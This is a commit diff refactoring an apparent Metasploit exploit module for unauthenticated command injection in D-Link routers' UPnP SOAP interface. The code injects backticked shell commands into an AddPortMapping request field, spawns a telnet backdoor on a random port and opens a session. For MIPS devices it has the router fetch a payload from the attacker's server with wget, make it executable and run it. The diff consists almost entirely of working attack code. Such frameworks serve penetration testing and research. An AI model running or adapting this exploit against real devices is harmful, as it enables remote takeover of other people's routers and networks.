functions and some tweaking

m-1-k-3 · m-1-k-3 · commit f26b60a0829a · 2013-07-19T07:57:27.000+02:00
diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -59,164 +59,118 @@ def initialize(info = {})
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Telnet',	#all devices
+					[ 'Telnet',	#all devices - default target
 						{
 						'Arch' => ARCH_CMD,
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Linux mipsel Payload',	#DIR-865, DIR-645, and others with wget installed
+					[ 'Linux mipsel Payload',	#DIR-865, DIR-645 and others with wget installed
 						{
 						'Arch' => ARCH_MIPSLE,
 						'Platform' => 'linux'
 						}
 					],
 				],
-			'DefaultTarget'  => 0
+			'DefaultTarget'  => 1
 			))
 
 		register_options(
 			[
-				Opt::RPORT(49152),
+				Opt::RPORT(49152),	#port of UPnP SOAP webinterface
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
 			], self.class)
 	end
 
+	def exploit
+		new_portmapping_description = rand_text_alpha(8)
+		new_external_port = rand(65535)
+		new_internal_port = rand(65535)
 
-	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-
-		uri = '/soap.cgi'
-
-		data_cmd = "<?xml version=\"1.0\"?>"
-		data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
-		data_cmd << "<SOAP-ENV:Body>"
-
-		if type == "add"
-			vprint_status("#{rhost}:#{rport} - adding portmapping")
-
-			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
-
-			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
-			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
-			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
-			data_cmd << "<NewEnabled>1</NewEnabled>"
-			data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
-			data_cmd << "<NewRemoteHost></NewRemoteHost>"
-			data_cmd << "<NewProtocol>TCP</NewProtocol>"
-			data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
-			data_cmd << "</m:AddPortMapping>"
+		if target.name =~ /CMD/
+			exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+		elsif target.name =~ /Telnet/
+			exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
 		else
-			#we should clean it up ... otherwise we are not able to exploit it multiple times
-			vprint_status("#{rhost}:#{rport} - deleting portmapping")
-			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
-
-			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
-			data_cmd << "</m:DeletePortMapping>"
+			exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
 		end
+	end
 
-		data_cmd << "</SOAP-ENV:Body>"
-		data_cmd << "</SOAP-ENV:Envelope>"
-
-		begin
-			res = send_request_cgi({
-				'uri'    => uri,
-				'vars_get' => {
-					'service' => 'WANIPConn1'
-				},
-				'ctype' => "text/xml",
-				'method' => 'POST',
-				'headers' => {
-					'SOAPAction' => soapaction,
-					},
-				'data' => data_cmd
-			})
-		return res
-		rescue ::Rex::ConnectionError
-			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-			return nil
+	def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
+		if not (datastore['CMD'])
+			fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
 		end
+		cmd = payload.encoded
+		type = "add"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+		type = "delete"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+		return
 	end
 
-	def exploit
-		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+	def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
+		telnetport = rand(65535)
 
-		new_portmapping_description = rand_text_alpha(8)
-		new_external_port = rand(65535)
-		new_internal_port = rand(65535)
+		vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
-		if target.name =~ /CMD/
-			if not (datastore['CMD'])
-				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-			end
-			cmd = payload.encoded
-			type = "add"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-			print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-			type = "delete"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-			return
+		cmd = "telnetd -p #{telnetport}"
+		type = "add"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+		end
+		type = "delete"
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 
-		if target.name =~ /Telnet/
-			telnetport = rand(65535)
-
-			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
-
-			cmd = "telnetd -p #{telnetport}"
-			type = "add"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
-			type = "delete"
-			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-			if (!res or res.code != 200)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			end
+		begin
+			sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-			begin
-				sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-				if sock
-					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-				else
-					fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-				end
-
-				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
-				auth_info = {
-					:host   => rhost,
-					:port   => telnetport,
-					:sname => 'telnet',
-					:user   => "",
-					:pass	=> "",
-					:source_type => "exploit",
-					:active => true
-				}
-				report_auth_info(auth_info)
-				merge_me = {
-					'USERPASS_FILE' => nil,
-					'USER_FILE'     => nil,
-					'PASS_FILE'     => nil,
-					'USERNAME'      => nil,
-					'PASSWORD'      => nil
-				}
-				start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-			rescue
+			if sock
+				print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
+			else
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
-			return
+
+			print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
+			auth_info = {
+				:host   => rhost,
+				:port   => telnetport,
+				:sname => 'telnet',
+				:user   => "",
+				:pass	=> "",
+				:source_type => "exploit",
+				:active => true
+			}
+			report_auth_info(auth_info)
+			merge_me = {
+				'USERPASS_FILE' => nil,
+				'USER_FILE'     => nil,
+				'PASS_FILE'     => nil,
+				'USERNAME'      => nil,
+				'PASSWORD'      => nil
+			}
+			start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+		rescue
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 		end
+		return
+	end
+
+	def exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
+
+		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
 		#thx to Juan for his awesome work on the mipsel elf support
 		@pl = generate_payload_exe
@@ -267,7 +221,7 @@ def exploit
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
 		type = "add"
 		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-		if (!res or res.code != 200)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
 
@@ -283,11 +237,67 @@ def exploit
 
 		type = "delete"
 		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
-		if (!res or res.code != 200)
+		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 	end
 
+	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
+
+		uri = '/soap.cgi'
+
+		data_cmd = "<?xml version=\"1.0\"?>"
+		data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+		data_cmd << "<SOAP-ENV:Body>"
+
+		if type == "add"
+			vprint_status("#{rhost}:#{rport} - adding portmapping")
+
+			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+
+			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+			data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
+			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
+			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
+			data_cmd << "<NewEnabled>1</NewEnabled>"
+			data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
+			data_cmd << "<NewRemoteHost></NewRemoteHost>"
+			data_cmd << "<NewProtocol>TCP</NewProtocol>"
+			data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
+			data_cmd << "</m:AddPortMapping>"
+		else
+			#we should clean it up ... otherwise we are not able to exploit it multiple times
+			vprint_status("#{rhost}:#{rport} - deleting portmapping")
+			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
+
+			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
+			data_cmd << "</m:DeletePortMapping>"
+		end
+
+		data_cmd << "</SOAP-ENV:Body>"
+		data_cmd << "</SOAP-ENV:Envelope>"
+
+		begin
+			res = send_request_cgi({
+				'uri'    => uri,
+				'vars_get' => {
+					'service' => 'WANIPConn1'
+				},
+				'ctype' => "text/xml",
+				'method' => 'POST',
+				'headers' => {
+					'SOAPAction' => soapaction,
+					},
+				'data' => data_cmd
+			})
+		return res
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return nil
+		end
+	end
+
 	# Handle incoming requests from the server
 	def on_request_uri(cli, request)
 		#print_status("on_request_uri called: #{request.inspect}")
